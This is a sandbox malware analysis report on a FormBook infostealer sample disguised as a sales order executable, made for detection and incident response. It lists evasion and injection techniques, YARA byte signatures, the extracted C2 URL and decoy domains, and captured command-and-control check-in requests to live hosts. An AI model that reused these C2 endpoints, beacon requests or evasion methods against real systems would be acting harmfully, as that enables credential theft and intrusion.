Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SALES ORDER875.exe

Overview

General Information

Sample name:SALES ORDER875.exe
Analysis ID:1546714
MD5:6ac24df0d8b58005679910e42981dbe8
SHA1:e421e5241a965e8714d3506dfb0aabc06ee52603
SHA256:eb00047a6b0c3483760d36fc53b69398768f28532003f44d0b402052f65bbd24
Tags:exeFormbook
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Found API chain indicative of sandbox detection
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Uses netsh to modify the Windows network and firewall settings
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • SALES ORDER875.exe (PID: 6380 cmdline: "C:\Users\user\Desktop\SALES ORDER875.exe" MD5: 6AC24DF0D8B58005679910E42981DBE8)
    • svchost.exe (PID: 5228 cmdline: "C:\Users\user\Desktop\SALES ORDER875.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • explorer.exe (PID: 2580 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
        • netsh.exe (PID: 7032 cmdline: "C:\Windows\SysWOW64\netsh.exe" MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
          • cmd.exe (PID: 4904 cmdline: /c del "C:\Windows\SysWOW64\svchost.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 6016 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
{"C2 list": ["www.9net88.net/ge07/"], "decoy": ["amyard.shop", "eloshost.xyz", "g18q11a.top", "orensic-vendor-735524320.click", "ithin-ksvodn.xyz", "xhyx.top", "elonix-traceglow.pro", "cillascrewedsedroth.cfd", "wner-nyquh.xyz", "reyhazeusa.shop", "esmellretaperetotal.cfd", "hqm-during.xyz", "pipagtxcorrelo.xyz", "lray-civil.xyz", "apybarameme.xyz", "rbuds.shop", "hild-fcudh.xyz", "rkgexg.top", "estwestcottwines.shop", "giyztm.xyz", "epehr.pics", "lways-vhyrp.xyz", "acifictechnologycctv.net", "iscinddocenaemlynne.cfd", "ridesmaidgiftsboutiqueki.shop", "ubtleclothingco.fashion", "hemicans.xyz", "ebaoge318.top", "zoc-marriage.xyz", "ngeribe2.homes", "oal-ahzgwo.xyz", "eries-htii.xyz", "ool-covers76.xyz", "ecurityemployment.today", "croom.net", "f7y2i9fgm.xyz", "earch-lawyer-consultation.today", "066iwx2t.shop", "ound-omagf.xyz", "ivglass.xyz", "fdyh-investment.xyz", "yegle.net", "eader-aaexvn.xyz", "dvle-father.xyz", "onsfskfsmpfssfpewqdsawqe.xyz", "ffect-xedzl.xyz", "ood-packaging-jobs-brasil.today", "lasterdeals.shop", "ehkd.top", "pm-22-ns-2.click", "ocockbowerlybrawer.cfd", "ostcanadantpl.top", "vrkof-point.xyz", "lsader.app", "nce-ystyx.xyz", "azl.pro", "ea-yogkkb.xyz", "isit-txax.xyz", "rowadservepros.net", "6282.xyz", "roduct-xgky.xyz", "wner-nyquh.xyz", "sfmoreservicesllc.lat", "rasko.net"]}
SourceRuleDescriptionAuthorStrings
00000004.00000002.4124920837.00000000001D0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000004.00000002.4124920837.00000000001D0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000004.00000002.4124920837.00000000001D0000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
      • 0x1cb80:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      • 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
      00000004.00000002.4124920837.00000000001D0000.00000040.80000000.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b8e7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c8ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      00000004.00000002.4124920837.00000000001D0000.00000040.80000000.00040000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
      • 0x18809:$sqlite3step: 68 34 1C 7B E1
      • 0x1891c:$sqlite3step: 68 34 1C 7B E1
      • 0x18838:$sqlite3text: 68 38 2A 90 C5
      • 0x1895d:$sqlite3text: 68 38 2A 90 C5
      • 0x1884b:$sqlite3blob: 68 53 D8 7F 8C
      • 0x18973:$sqlite3blob: 68 53 D8 7F 8C
      Click to see the 34 entries
      SourceRuleDescriptionAuthorStrings
      1.2.svchost.exe.6b0000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        1.2.svchost.exe.6b0000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          1.2.svchost.exe.6b0000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x5451:$a1: 3C 30 50 4F 53 54 74 09 40
          • 0x1bd80:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x9bbf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          • 0x14aa7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
          1.2.svchost.exe.6b0000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8d72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x148a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x149a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x14b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x978a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1360c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa483:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1aae7:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1baea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          1.2.svchost.exe.6b0000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
          • 0x17a09:$sqlite3step: 68 34 1C 7B E1
          • 0x17b1c:$sqlite3step: 68 34 1C 7B E1
          • 0x17a38:$sqlite3text: 68 38 2A 90 C5
          • 0x17b5d:$sqlite3text: 68 38 2A 90 C5
          • 0x17a4b:$sqlite3blob: 68 53 D8 7F 8C
          • 0x17b73:$sqlite3blob: 68 53 D8 7F 8C
          Click to see the 10 entries

          System Summary

          barindex
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\SALES ORDER875.exe", CommandLine: "C:\Users\user\Desktop\SALES ORDER875.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\SALES ORDER875.exe", ParentImage: C:\Users\user\Desktop\SALES ORDER875.exe, ParentProcessId: 6380, ParentProcessName: SALES ORDER875.exe, ProcessCommandLine: "C:\Users\user\Desktop\SALES ORDER875.exe", ProcessId: 5228, ProcessName: svchost.exe
          Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\SALES ORDER875.exe", CommandLine: "C:\Users\user\Desktop\SALES ORDER875.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\SALES ORDER875.exe", ParentImage: C:\Users\user\Desktop\SALES ORDER875.exe, ParentProcessId: 6380, ParentProcessName: SALES ORDER875.exe, ProcessCommandLine: "C:\Users\user\Desktop\SALES ORDER875.exe", ProcessId: 5228, ProcessName: svchost.exe
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-01T14:07:13.604938+010020229301A Network Trojan was detected4.175.87.197443192.168.2.449730TCP
          2024-11-01T14:07:52.286999+010020229301A Network Trojan was detected4.175.87.197443192.168.2.449736TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-01T14:09:11.722171+010020314531Malware Command and Control Activity Detected192.168.2.450002199.59.243.22780TCP
          2024-11-01T14:09:32.405646+010020314531Malware Command and Control Activity Detected192.168.2.450003216.239.32.5280TCP

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: SALES ORDER875.exeAvira: detected
          Source: 00000004.00000002.4124920837.00000000001D0000.00000040.80000000.00040000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.9net88.net/ge07/"], "decoy": ["amyard.shop", "eloshost.xyz", "g18q11a.top", "orensic-vendor-735524320.click", "ithin-ksvodn.xyz", "xhyx.top", "elonix-traceglow.pro", "cillascrewedsedroth.cfd", "wner-nyquh.xyz", "reyhazeusa.shop", "esmellretaperetotal.cfd", "hqm-during.xyz", "pipagtxcorrelo.xyz", "lray-civil.xyz", "apybarameme.xyz", "rbuds.shop", "hild-fcudh.xyz", "rkgexg.top", "estwestcottwines.shop", "giyztm.xyz", "epehr.pics", "lways-vhyrp.xyz", "acifictechnologycctv.net", "iscinddocenaemlynne.cfd", "ridesmaidgiftsboutiqueki.shop", "ubtleclothingco.fashion", "hemicans.xyz", "ebaoge318.top", "zoc-marriage.xyz", "ngeribe2.homes", "oal-ahzgwo.xyz", "eries-htii.xyz", "ool-covers76.xyz", "ecurityemployment.today", "croom.net", "f7y2i9fgm.xyz", "earch-lawyer-consultation.today", "066iwx2t.shop", "ound-omagf.xyz", "ivglass.xyz", "fdyh-investment.xyz", "yegle.net", "eader-aaexvn.xyz", "dvle-father.xyz", "onsfskfsmpfssfpewqdsawqe.xyz", "ffect-xedzl.xyz", "ood-packaging-jobs-brasil.today", "lasterdeals.shop", "ehkd.top", "pm-22-ns-2.click", "ocockbowerlybrawer.cfd", "ostcanadantpl.top", "vrkof-point.xyz", "lsader.app", "nce-ystyx.xyz", "azl.pro", "ea-yogkkb.xyz", "isit-txax.xyz", "rowadservepros.net", "6282.xyz", "roduct-xgky.xyz", "wner-nyquh.xyz", "sfmoreservicesllc.lat", "rasko.net"]}
          Source: SALES ORDER875.exeReversingLabs: Detection: 55%
          Source: Yara matchFile source: 1.2.svchost.exe.6b0000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.SALES ORDER875.exe.2340000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.SALES ORDER875.exe.2340000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000004.00000002.4124920837.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.4125151354.0000000000600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.1898494781.0000000003100000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1832217978.0000000002340000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.4125211297.0000000000630000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.1898295736.0000000000870000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.1898140559.00000000006B1000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
          Source: SALES ORDER875.exeJoe Sandbox ML: detected
          Source: SALES ORDER875.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
          Source: Binary string: netsh.pdb source: svchost.exe, 00000001.00000002.1898626639.0000000003180000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 00000001.00000003.1897815254.0000000002C1C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1897949965.0000000002C2F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1897815254.0000000002C2C000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, netsh.exe, 00000004.00000002.4126745037.0000000001560000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: SALES ORDER875.exe, 00000000.00000003.1828189983.00000000041C0000.00000004.00001000.00020000.00000000.sdmp, SALES ORDER875.exe, 00000000.00000003.1823570510.0000000004360000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1828434311.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1898690077.000000000339E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1829990258.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1898690077.0000000003200000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 00000004.00000003.1898449365.0000000000A5B000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4125785464.0000000000F6E000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 00000004.00000003.1900238862.0000000000C23000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4125785464.0000000000DD0000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: netsh.pdbGCTL source: svchost.exe, 00000001.00000002.1898626639.0000000003180000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 00000001.00000003.1897815254.0000000002C1C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1897949965.0000000002C2F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1897815254.0000000002C2C000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4126745037.0000000001560000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: SALES ORDER875.exe, 00000000.00000003.1828189983.00000000041C0000.00000004.00001000.00020000.00000000.sdmp, SALES ORDER875.exe, 00000000.00000003.1823570510.0000000004360000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000003.1828434311.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1898690077.000000000339E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1829990258.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1898690077.0000000003200000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, netsh.exe, 00000004.00000003.1898449365.0000000000A5B000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4125785464.0000000000F6E000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 00000004.00000003.1900238862.0000000000C23000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4125785464.0000000000DD0000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: svchost.pdb source: explorer.exe, 00000003.00000002.4141739239.0000000010D2F000.00000004.80000000.00040000.00000000.sdmp, netsh.exe, 00000004.00000002.4125249385.0000000000695000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4126879168.000000000377F000.00000004.10000000.00040000.00000000.sdmp
          Source: Binary string: svchost.pdbUGP source: explorer.exe, 00000003.00000002.4141739239.0000000010D2F000.00000004.80000000.00040000.00000000.sdmp, netsh.exe, 00000004.00000002.4125249385.0000000000695000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4126879168.000000000377F000.00000004.10000000.00040000.00000000.sdmp
          Source: C:\Users\user\Desktop\SALES ORDER875.exeCode function: 0_2_003F68EE FindFirstFileW,FindClose,0_2_003F68EE
          Source: C:\Users\user\Desktop\SALES ORDER875.exeCode function: 0_2_003F698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_003F698F
          Source: C:\Users\user\Desktop\SALES ORDER875.exeCode function: 0_2_003ED076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_003ED076
          Source: C:\Users\user\Desktop\SALES ORDER875.exeCode function: 0_2_003ED3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_003ED3A9
          Source: C:\Users\user\Desktop\SALES ORDER875.exeCode function: 0_2_003F9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_003F9642
          Source: C:\Users\user\Desktop\SALES ORDER875.exeCode function: 0_2_003F979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_003F979D
          Source: C:\Users\user\Desktop\SALES ORDER875.exeCode function: 0_2_003F9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_003F9B2B
          Source: C:\Users\user\Desktop\SALES ORDER875.exeCode function: 0_2_003EDBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_003EDBBE
          Source: C:\Users\user\Desktop\SALES ORDER875.exeCode function: 0_2_003F5C97 FindFirstFileW,FindNextFileW,FindClose,0_2_003F5C97

          Networking

          barindex
          Source: Network trafficSuricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.4:50002 -> 199.59.243.227:80
          Source: Network trafficSuricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.4:50002 -> 199.59.243.227:80
          Source: Network trafficSuricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.4:50002 -> 199.59.243.227:80
          Source: Network trafficSuricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.4:50003 -> 216.239.32.52:80
          Source: Network trafficSuricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.4:50003 -> 216.239.32.52:80
          Source: Network trafficSuricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.4:50003 -> 216.239.32.52:80
          Source: C:\Windows\explorer.exeNetwork Connect: 199.59.243.227 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 216.239.32.52 80Jump to behavior
          Source: Malware configuration extractorURLs: www.9net88.net/ge07/
          Source: DNS query: www.ool-covers76.xyz
          Source: DNS query: www.zoc-marriage.xyz
          Source: DNS query: www.ivglass.xyz
          Source: global trafficHTTP traffic detected: GET /ge07/?AZFdK=5jGt1VUhS4spDnR&bb=rInKjcPO3O96ojanc4NFv2coOl+G9i0Xo3vzod/XDYjf3VmyXg5Nkxs22tP8faITl6ID HTTP/1.1Host: www.9net88.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ge07/?bb=jzpSmAmxAHuMrBYVYK/iobfyuTkKVe1DkRFizLdS8mEnIcKQ83L44yYAyf2Gtg0WJqSR&AZFdK=5jGt1VUhS4spDnR HTTP/1.1Host: www.yegle.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 199.59.243.227 199.59.243.227
          Source: Joe Sandbox ViewASN Name: BODIS-NJUS BODIS-NJUS
          Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.175.87.197:443 -> 192.168.2.4:49736
          Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.175.87.197:443 -> 192.168.2.4:49730
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: C:\Users\user\Desktop\SALES ORDER875.exeCode function: 0_2_003FCE44 InternetReadFile,SetEvent,GetLastError,SetEvent,0_2_003FCE44
          Source: global trafficHTTP traffic detected: GET /ge07/?AZFdK=5jGt1VUhS4spDnR&bb=rInKjcPO3O96ojanc4NFv2coOl+G9i0Xo3vzod/XDYjf3VmyXg5Nkxs22tP8faITl6ID HTTP/1.1Host: www.9net88.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ge07/?bb=jzpSmAmxAHuMrBYVYK/iobfyuTkKVe1DkRFizLdS8mEnIcKQ83L44yYAyf2Gtg0WJqSR&AZFdK=5jGt1VUhS4spDnR HTTP/1.1Host: www.yegle.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficDNS traffic detected: DNS query: www.lasterdeals.shop
          Source: global trafficDNS traffic detected: DNS query: www.rkgexg.top
          Source: global trafficDNS traffic detected: DNS query: www.ocockbowerlybrawer.cfd
          Source: global trafficDNS traffic detected: DNS query: www.ool-covers76.xyz
          Source: global trafficDNS traffic detected: DNS query: www.9net88.net
          Source: global trafficDNS traffic detected: DNS query: www.yegle.net
          Source: global trafficDNS traffic detected: DNS query: www.iscinddocenaemlynne.cfd
          Source: global trafficDNS traffic detected: DNS query: www.zoc-marriage.xyz
          Source: global trafficDNS traffic detected: DNS query: www.ivglass.xyz
          Source: global trafficDNS traffic detected: DNS query: www.pm-22-ns-2.click
          Source: explorer.exe, 00000003.00000000.1841567797.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4135604265.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1844128294.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114628168.000000000982D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
          Source: explorer.exe, 00000003.00000000.1841567797.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4135604265.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1844128294.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114628168.000000000982D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
          Source: explorer.exe, 00000003.00000000.1841567797.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4135604265.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1844128294.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114628168.000000000982D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
          Source: explorer.exe, 00000003.00000000.1841567797.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4135604265.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1844128294.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114628168.000000000982D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
          Source: explorer.exe, 00000003.00000000.1841567797.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4130863313.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
          Source: explorer.exe, 00000003.00000002.4134940464.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.4134269586.0000000007F40000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.1845690815.0000000009B60000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
          Source: explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.9net88.net
          Source: explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.9net88.net/ge07/
          Source: explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.9net88.net/ge07/www.yegle.net
